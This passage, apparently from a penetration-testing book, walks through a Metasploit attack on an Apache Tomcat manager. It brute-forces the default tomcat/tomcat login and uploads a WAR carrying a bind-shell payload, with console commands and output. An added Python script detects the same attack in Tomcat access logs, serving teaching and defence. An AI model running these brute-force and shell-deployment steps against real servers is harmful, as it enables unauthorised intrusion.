Simulated Penetration Test
261
service.) After some more research on the version number of the Apache Tomcat installation running on the target, the Tomcat manager seemed the best route for compromising the system. If we can get through Tomcat's manager function, we can use the HTTP PUT method to deploy our payload on the vulnerable system. We launch the attack as follows (with the list of exploits and payloads snipped):
msf > search apache
[*] Searching loaded modules for pattern 'apache'...
. . . SNIP . . .
msf auxiliary(tomcat_mgr_login) > set RHOSTS 172.16.32.162
RHOSTS => 172.16.32.162
msf auxiliary(tomcat_mgr_login) > set THREADS 50
THREADS => 50
msf auxiliary(tomcat_mgr_login) > set RPORT 8180
RPORT => 8180
msf auxiliary(tomcat_mgr_login) > set VERBOSE false
VERBOSE => false
msf auxiliary(tomcat_mgr_login) > run
[+] http://172.16.32.162:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] successful login 'tomcat' : 'tomcat'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tomcat_mgr_login) >
Our brute-force attack is successful, and it logs in with the username tomcat and password tomcat. But we don't yet have a shell.
With our newly discovered credentials, we leverage Apache's HTTP PUT functionality with the multi/http/tomcat_mgr_deploy exploit to place our payload on the system, using the valid username and password that we discovered by brute-forcing the login.
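Both stages of this attack leave a distinctive trail in Tomcat's access log: a burst of 401 responses on /manager/ from one source, then a 200 for the same source with an authenticated user, then a PUT (or an HTML-interface POST) to the manager's deploy endpoint. The following detector is an added example written for this discussion; it is not part of the original book or of Metasploit. It parses lines in Tomcat's AccessLogValve "common" pattern and raises an alert for each stage. The sample log lines, the failed-login threshold of 10 and the client address 172.16.32.50 are constructed assumptions; the WAR name is the one from the session above.

```python
import re
from collections import defaultdict

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\S+)$'
)

# Manager requests that deploy an application. Tomcat 5.5/6 expose the text
# interface at /manager/deploy (HTTP PUT); later versions use /manager/text/deploy,
# and the HTML interface uploads a WAR via POST to /manager/html/upload.
DEPLOY_RE = re.compile(r'^/manager/(text/)?deploy\b|^/manager/html/upload\b')

BRUTE_FORCE_THRESHOLD = 10  # failed manager logins from one source (assumed value)


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def analyze(lines, threshold=BRUTE_FORCE_THRESHOLD):
    """Return a list of (alert_type, source_ip, detail) tuples, in log order."""
    failures = defaultdict(int)   # failed manager logins per source address
    brute_reported = set()        # sources already flagged for brute forcing
    logged_in = set()             # sources that succeeded after earlier failures
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or not rec["path"].startswith("/manager"):
            continue
        src = rec["host"]
        if rec["status"] in (401, 403):
            failures[src] += 1
            if failures[src] >= threshold and src not in brute_reported:
                brute_reported.add(src)
                alerts.append(("manager_bruteforce", src,
                               f"{failures[src]} failed manager logins"))
        elif rec["status"] < 300:
            # A success following failures from the same source means a
            # guessed (or default) credential is now in use.
            if failures[src] > 0 and src not in logged_in:
                logged_in.add(src)
                alerts.append(("login_after_failures", src,
                               f"user {rec['user']!r} after {failures[src]} failures"))
            if rec["method"] in ("PUT", "POST") and DEPLOY_RE.match(rec["path"]):
                alerts.append(("manager_deploy", src,
                               f"{rec['method']} {rec['path']} by user {rec['user']!r}"))
    return alerts


# Constructed sample log: 12 failed manager logins, one success, one WAR deploy,
# and an unrelated request from another client.
SAMPLE_LOG = [
    '172.16.32.50 - - [10/Jun/2011:14:02:%02d +0000] "GET /manager/html HTTP/1.1" 401 2473' % i
    for i in range(12)
] + [
    '172.16.32.50 - tomcat [10/Jun/2011:14:02:30 +0000] "GET /manager/html HTTP/1.1" 200 15241',
    '172.16.32.50 - tomcat [10/Jun/2011:14:02:41 +0000] '
    '"PUT /manager/deploy?path=/FW36owipzcnHeUyIUaX HTTP/1.1" 200 91',
    '10.0.0.7 - - [10/Jun/2011:14:03:02 +0000] "GET /index.jsp HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for alert_type, src, detail in analyze(SAMPLE_LOG):
        print(f"{alert_type:22} {src:15} {detail}")
```

Running the script against the constructed log yields three alerts in sequence: manager_bruteforce, login_after_failures and manager_deploy, all attributed to the same source address. The deploy alert is worth raising on its own even without prior failures, since a legitimate operator rarely deploys through the manager from an address that has never done so before; the threshold and the set of deploy paths should be adjusted to the Tomcat version and deployment practice in use.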
msf auxiliary(tomcat_mgr_login) > use multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set password tomcat
password => tomcat
msf exploit(tomcat_mgr_deploy) > set username tomcat
username => tomcat
msf exploit(tomcat_mgr_deploy) > set RHOST 172.16.32.162
RHOST => 172.16.32.162
msf exploit(tomcat_mgr_deploy) > set LPORT 9999
LPORT => 9999
msf exploit(tomcat_mgr_deploy) > set RPORT 8180
RPORT => 8180
msf exploit(tomcat_mgr_deploy) > set payload linux/x86/shell_bind_tcp
payload => linux/x86/shell_bind_tcp
msf exploit(tomcat_mgr_deploy) > exploit
[*] Using manually select target "Linux X86"
[*] Uploading 1669 bytes as FW36owipzcnHeUyIUaX.war ...
[*] Started bind handler